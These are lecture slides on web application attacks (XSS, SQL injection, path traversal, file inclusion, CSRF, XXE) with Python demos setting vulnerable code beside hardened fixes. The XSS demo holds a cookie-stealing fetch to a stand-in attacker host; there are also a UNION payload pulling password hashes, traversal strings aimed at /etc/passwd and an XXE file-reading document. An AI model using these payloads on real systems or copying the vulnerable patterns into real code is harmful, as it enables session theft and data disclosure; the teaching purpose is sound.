WEB APPLICATION
ATTACKS
Cybersecurity
Web Application Statistics
Web Application
- A web application is software that runs on a web
server and is used through a web browser over a
network connection. This differs from local
software, which runs directly on the user's device.
Because the code lives on the server, nothing beyond
the browser has to be installed on the user's end,
and the application can be customized centrally to
meet a business's specifications.
Web Application Attacks
- Web application attacks are malicious activities
that target web applications by exploiting
vulnerabilities in their design or implementation.
The attacker usually needs nothing more than a
browser or an HTTP client. These attacks can result
in unauthorized access, data theft, service outages
or other harmful consequences.
TYPES OF WEB
APPLICATION
ATTACKS
• Cross-site scripting (XSS):
In an XSS attack, an attacker gets malicious script into a page
served by a trusted website or web application, for example by
submitting it in a form field or URL parameter that the
application echoes back into its HTML without encoding it.
Because the browser cannot tell the injected script from the
site's own code, it runs the script with the site's origin and
the victim's session. XSS can be used to steal session cookies
and other data, perform actions as the victim, or deface the
page. While the technique is considered unsophisticated, it is
common and can do significant harm.
CROSS-SITE
SCRIPTING (XSS)
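The reflected XSS case described above, as an added example (not code from the original slides): a search page built by plain string concatenation beside the same page built with output encoding, plus a Content-Security-Policy header as a second layer. The page layout, the two payloads and the `executes_script` check are constructed for this demonstration.

```python
"""Reflected XSS: the same search term rendered by a naive and by a hardened
page builder. Added example; the site, its "search" page and the payloads are
constructed for illustration and are not from the original slides."""
import html

# Constructed attacker inputs: one aimed at element content, one at an
# attribute value where it tries to break out of the surrounding quotes.
PAYLOAD_BODY = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
PAYLOAD_ATTR = '" onfocus="alert(document.cookie)" autofocus="'


def render_unsafe(term: str) -> str:
    """Vulnerable: the user-controlled term is concatenated straight into HTML.
    Whatever the user typed becomes markup and is executed by the browser."""
    return (
        "<h1>Results for " + term + "</h1>\n"
        '<input name="q" value="' + term + '">'
    )


def render_safe(term: str) -> str:
    """Hardened: every untrusted value is HTML-encoded before it is placed in
    the page. html.escape(quote=True) also encodes both quote characters,
    which is what stops the attribute payload from closing the value early."""
    safe = html.escape(term, quote=True)
    return (
        "<h1>Results for " + safe + "</h1>\n"
        '<input name="q" value="' + safe + '">'
    )


def executes_script(page: str) -> bool:
    """Crude check used by the demo: does the page contain a live <script>
    element or an event-handler attribute that an injected value opened?"""
    lowered = page.lower()
    return "<script" in lowered or ' onfocus="' in lowered


def response_headers() -> dict:
    """Defence in depth: a Content-Security-Policy that forbids inline script
    blocks the payload even if an encoding bug slips through somewhere."""
    return {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
    }


if __name__ == "__main__":
    for payload in (PAYLOAD_BODY, PAYLOAD_ATTR):
        print("payload:", payload)
        print("  unsafe page executes script:", executes_script(render_unsafe(payload)))
        print("  safe page executes script:  ", executes_script(render_safe(payload)))
        print("  safe page fragment:", render_safe(payload).splitlines()[1])
```

Encoding has to match the context the value lands in: `html.escape` is right for element text and quoted attributes, but a value placed inside a `<script>` block, a URL or a CSS rule needs that context's own encoding.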
• SQL injection (SQLI):
SQL injection occurs when untrusted input is pasted into the
text of the queries a web application sends to its database,
so an attacker can change the structure of a query rather
than just the value it searches for. A successful injection
can let an intruder read sensitive data from the database,
modify or delete it, or in some configurations run database
commands that change the web application's content or
behaviour. The standard defence is parameterised queries
(prepared statements), which keep data separate from the
SQL text.
SQL INJECTION
(SQLI)
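A worked instance of the data-theft case above, added here as an example rather than taken from the slides: a product search that formats the search term into its SQL, a UNION payload that pulls rows out of a separate users table, and the parameterised version that treats the same payload as plain data. The database (Python's built-in sqlite3, in memory), its rows and the payload are constructed for the demonstration.

```python
"""UNION-based SQL injection against a product search, shown vulnerable and
parameterised. Added example using Python's built-in sqlite3; the schema, rows
and payload are constructed for illustration, not taken from the slides."""
import sqlite3

# Constructed payload: closes the LIKE pattern, appends a UNION that selects
# two columns from another table, and comments out the rest of the query.
PAYLOAD = "x%' UNION SELECT username, password_hash FROM users --"


def build_demo_db() -> sqlite3.Connection:
    """In-memory database with a public table and a sensitive one."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (name TEXT, price TEXT);
        INSERT INTO products VALUES ('widget', '9.99'), ('gadget', '19.99');
        CREATE TABLE users (username TEXT, password_hash TEXT);
        INSERT INTO users VALUES ('admin', '$2b$12$constructed-hash-value');
        """
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    """Vulnerable: the term is formatted into the SQL text, so a quote in it
    ends the string literal and the rest is parsed as SQL."""
    sql = f"SELECT name, price FROM products WHERE name LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, term: str) -> list:
    """Hardened: the term is bound as a parameter. The driver passes it to
    the engine as a value, so the payload is just an unmatched pattern."""
    sql = "SELECT name, price FROM products WHERE name LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


def leaks_credentials(rows: list) -> bool:
    """True if a user-table row showed up in what should be product results."""
    return any(name == "admin" for name, _ in rows)


if __name__ == "__main__":
    db = build_demo_db()
    print("normal search :", search_safe(db, "wid"))
    print("vulnerable    :", search_vulnerable(db, PAYLOAD))
    print("parameterised :", search_safe(db, PAYLOAD))
```

The UNION has to supply the same number of columns as the original SELECT (two here); in practice attackers first probe that count with `ORDER BY n` or `UNION SELECT NULL, NULL` before asking for real columns.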
• Path traversal:
This attack, also known as directory traversal, manipulates a file path that the
application builds from user input (for example `../../etc/passwd`, or its URL-encoded
form `..%2F..%2Fetc%2Fpasswd`) so that it points outside the web root. The attacker can
then read files the application was never meant to serve, such as configuration files,
source code and credentials.
• Local file inclusion (LFI):
This technique tricks the web application into including, and often executing, a file
that is already on the web server. It occurs when the application builds the name of a
file to include from attacker-controlled input and treats that input as trusted. An
attacker may first use path traversal to learn which files exist on the server, and
then make the application include one of them. Local file inclusion can lead to
information disclosure, XSS and remote code execution, the last typically when the
included file contains content the attacker was able to write earlier (a log entry or
an uploaded file).
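One check that covers both the traversal and the inclusion cases above, added as an example (not code from the slides): a static-file handler that trusts `os.path.join`, beside a resolver that canonicalises the requested path and refuses anything that leaves the real web root; the same resolver then guards a `page=` style template include. The web root, its files and the request strings are constructed in a temporary directory.

```python
"""Path traversal and local file inclusion against a static-file handler, with
the hardened path check beside the vulnerable one. Added example; the web root,
files and request paths are constructed in a temporary directory."""
import os
import tempfile
import urllib.parse


def build_demo_root() -> str:
    """Constructed layout: <base>/www is the web root, <base>/secret.txt is a
    file that must never be served. Returns the web root path."""
    base = tempfile.mkdtemp(prefix="traversal-demo-")
    root = os.path.join(base, "www")
    os.makedirs(os.path.join(root, "pages"))
    with open(os.path.join(root, "index.html"), "w") as f:
        f.write("<h1>hello</h1>")
    with open(os.path.join(root, "pages", "about.tmpl"), "w") as f:
        f.write("about page")
    with open(os.path.join(base, "secret.txt"), "w") as f:
        f.write("TOP SECRET")
    return root


def serve_vulnerable(root: str, request_path: str):
    """Vulnerable: os.path.join trusts the request. '..' segments walk out of
    the root, and an absolute path replaces the root entirely."""
    target = os.path.join(root, urllib.parse.unquote(request_path))
    try:
        with open(target) as f:
            return f.read()
    except OSError:
        return None


def resolve_under_root(root: str, request_path: str):
    """Resolve the request to a canonical path and refuse anything that does
    not stay inside the canonical root. realpath() also follows symlinks, so a
    link planted inside the root cannot point outside it either."""
    real_root = os.path.realpath(root)
    decoded = urllib.parse.unquote(request_path)  # one decode, as a framework would
    if "\0" in decoded:
        return None
    candidate = os.path.realpath(os.path.join(real_root, decoded.lstrip("/\\")))
    if os.path.commonpath([real_root, candidate]) != real_root:
        return None
    return candidate


def serve_safe(root: str, request_path: str):
    target = resolve_under_root(root, request_path)
    if target is None or not os.path.isfile(target):
        return None
    with open(target) as f:
        return f.read()


def include_template_safe(root: str, name: str):
    """Local file inclusion guard: a 'page' parameter may only select a
    template under <root>/pages, never an arbitrary file on the server."""
    return serve_safe(os.path.join(root, "pages"), name + ".tmpl")


if __name__ == "__main__":
    root = build_demo_root()
    for req in ("index.html", "../secret.txt", "..%2Fsecret.txt", "/etc/hostname"):
        print(f"{req!r:20} vulnerable={serve_vulnerable(root, req)!r}  safe={serve_safe(root, req)!r}")
    print("include about       ", include_template_safe(root, "about"))
    print("include ../index    ", include_template_safe(root, "../index"))
```

The comparison is done on `realpath` output on both sides; comparing raw strings (or checking only for the substring `..`) misses symlinks, `....//` tricks and double-encoded separators that are normalised later by the filesystem.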
• DDoS attacks:
A distributed denial-of-service attack floods a server with more requests
than it can handle. Attackers typically use a network of compromised computers
or bots (a botnet) so that the traffic arrives from many sources at once, which
can paralyze the server and prevent legitimate visitors from reaching your
services.
• Cross-site request forgery (CSRF):
CSRF occurs when an attacker tricks or forces the browser of an already
authenticated user into sending a request the user did not intend, for example
through a hidden form or image on a page the attacker controls. Because the
browser attaches the victim's session cookie automatically, the application
treats the forged request as a legitimate action by that user.
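The defence implied by the CSRF description above, as an added example that is not code from the slides: a synchronizer token bound to the session with an HMAC, checked on a state-changing endpoint, with a `SameSite` session cookie as the second layer. The server secret, session ids, endpoint and request dictionaries are constructed for the demonstration.

```python
"""Synchronizer-token defence against CSRF: a token bound to the session with
an HMAC and checked on every state-changing request. Added example; the secret,
session ids, endpoint and request dictionaries are constructed for illustration."""
import hashlib
import hmac
import secrets
import time

# Constructed server-side secret; in production load it from configuration.
SERVER_SECRET = secrets.token_bytes(32)
TOKEN_TTL = 3600  # seconds a token stays valid


def issue_csrf_token(session_id: str, now: float = None) -> str:
    """Token = issue time + HMAC(secret, session_id || issue time).
    Binding to the session means a token the attacker obtained from their own
    session is useless against the victim; the timestamp bounds replay."""
    ts = str(int(now if now is not None else time.time()))
    mac = hmac.new(SERVER_SECRET, f"{session_id}|{ts}".encode(), hashlib.sha256).hexdigest()
    return f"{ts}.{mac}"


def verify_csrf_token(session_id: str, token: str, now: float = None) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    try:
        ts, mac = token.split(".", 1)
        issued = int(ts)
    except (ValueError, AttributeError):
        return False
    current = now if now is not None else time.time()
    if current - issued > TOKEN_TTL or issued > current + 60:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}|{ts}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def handle_transfer(request: dict) -> str:
    """A constructed state-changing endpoint. 'session' is what the browser sent
    in its cookie (attached automatically, which is what CSRF exploits);
    'csrf_token' must come from the form the server rendered for that session,
    which a page on another origin cannot read."""
    if not verify_csrf_token(request.get("session", ""), request.get("csrf_token", "")):
        return "403 forbidden: missing or invalid CSRF token"
    return f"200 transferred {request['amount']} to {request['to']}"


def session_cookie(session_id: str) -> str:
    """Second line of defence: SameSite keeps the cookie off most cross-site
    requests in the first place, so the forged request arrives unauthenticated."""
    return f"session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    victim, attacker = "sess-victim-7f3a", "sess-attacker-9c1e"  # constructed ids
    legit = {"session": victim, "csrf_token": issue_csrf_token(victim), "amount": 100, "to": "alice"}
    forged = {"session": victim, "amount": 100, "to": "mallory"}
    with_attackers_token = dict(forged, csrf_token=issue_csrf_token(attacker))
    for name, req in (("legit form post", legit), ("forged cross-site post", forged),
                      ("forged, attacker's own token", with_attackers_token)):
        print(f"{name:30} -> {handle_transfer(req)}")
```

`SameSite=Lax` still lets top-level GET navigations carry the cookie, so state changes must not be reachable by GET; the token check is what protects POST handlers when the cookie does get sent.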
• XML external entity (XXE):
This attack abuses an XML parser that is configured to resolve
external entities declared in a document's DTD. A crafted
document can make the parser read local files (disclosing
confidential data such as passwords or keys), make requests to
internal systems on the server's behalf (server-side request
forgery), or expand entities until memory or CPU is exhausted
(denial of service). Disabling DTD processing or external entity
resolution in the parser removes the attack.
XML EXTERNAL
ENTITY (XXE)
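The file-disclosure case above, run for real against Python's standard `xml.sax` parser, as an added example that is not code from the slides: the same hostile document is parsed once with external entity resolution switched on (the misconfiguration) and once with it off, which is the default since Python 3.7.1. The "secret" file and the uploaded document are constructed in a temporary directory.

```python
"""XML external entity (XXE) file disclosure with Python's xml.sax parser,
once with external entity resolution switched on (the misconfiguration) and
once with the safe default. Added example; the secret file and the hostile
document are constructed in a temporary directory."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Gathers all character data the parser delivers, entity content included."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self) -> str:
        return "".join(self.parts).strip()


def build_secret_file() -> str:
    """Constructed stand-in for /etc/passwd or an application config file."""
    path = os.path.join(tempfile.mkdtemp(prefix="xxe-demo-"), "secret.txt")
    with open(path, "w") as f:
        f.write("TOP SECRET")
    return path


def hostile_document(secret_path: str) -> bytes:
    """The attacker's upload: a DTD declaring an external entity that points at
    a local file, then a reference to that entity in the document body."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE order [<!ENTITY xxe SYSTEM "{secret_path}">]>\n'
        "<order><note>&xxe;</note></order>"
    ).encode()


def parse_text(document: bytes, resolve_external: bool) -> str:
    """Parse the document and return the text the application would see."""
    parser = xml.sax.make_parser()
    # The misconfiguration: letting the parser fetch external general entities.
    # Python's default since 3.7.1 is False; older code often set it to True.
    parser.setFeature(feature_external_ges, resolve_external)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(document))
    return handler.text()


if __name__ == "__main__":
    doc = hostile_document(build_secret_file())
    print(doc.decode())
    print("external entities ON :", repr(parse_text(doc, resolve_external=True)))
    print("external entities OFF:", repr(parse_text(doc, resolve_external=False)))
```

With resolution on, the contents of the file are returned as ordinary element text, which is exactly what an application would then store or echo back to the attacker. With it off the reference is skipped and the element is empty. The same `SYSTEM` identifier can be an `http://` URL pointing at an internal host, which is the SSRF variant mentioned above.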
Most common vulnerabilities in Web Applications (the OWASP Top 10, 2021 edition)
• Broken access control
• Cryptographic failures
• Injection
• Insecure design
• Security misconfiguration
• Vulnerable and outdated components
• Identification and authentication failures
• Software and data integrity failures
• Security logging and monitoring failures
• Server-side request forgery
Ways to protect against website attacks
• Automated vulnerability
scanning and security testing
• Web application firewalls
• Secure development practices
and security testing throughout
the development lifecycle

LECTURE-DEC-6_web-application-attacks (1).pptx
